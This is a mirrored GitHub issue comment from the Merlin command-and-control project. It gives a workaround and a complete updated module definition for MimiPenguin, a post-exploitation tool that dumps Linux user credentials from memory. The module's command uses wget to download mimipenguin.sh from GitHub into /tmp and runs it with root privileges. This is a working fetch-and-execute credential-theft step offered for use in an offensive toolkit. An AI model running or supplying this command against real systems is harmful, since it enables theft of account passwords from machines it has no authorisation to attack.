GithubHelp home page GithubHelp logo

Comments (1)

Ne0nd0g avatar Ne0nd0g commented on August 18, 2024 1

It looks like the mimipenguin.sh script has been depreciated in favor of a compiled binary. I'll work on updating this module. A temporary work around is to update data/modules/linux/x64/bash/credentials/MimiPenguin.json with https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh

Here is a complete update of the module if you're interested:

{

  "base": {

    "name": "MimiPenguin",

    "author": ["Dan Borges (@ahhh"],

    "credits": ["Hunter Gregal (@HunterGregal)"],

    "path": ["linux", "x64", "bash", "credentials", "MimiPenguin.json"],

    "platform": "linux",

    "arch": "x64",

    "lang": "bash",

    "privilege": true,

    "notes": "https://attack.mitre.org/wiki/Software/S0179",

    "remote": "https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh",

    "local": ["data", "src", "huntergregal", "mimipenguin", "mimipenguin.sh"],

    "options": [],

    "description": "mimipenguin is a bash script used to find plaintext credentials in memory during post-exploitation. Must be run as root. It automates the dumping of memory and searches for Linux user credentials.",

    "commands": [

      "/bin/sh", "-c", "\"wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh; /bin/bash /tmp/mimipenguin.sh;\""

    ]

  }

}

from merlin.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.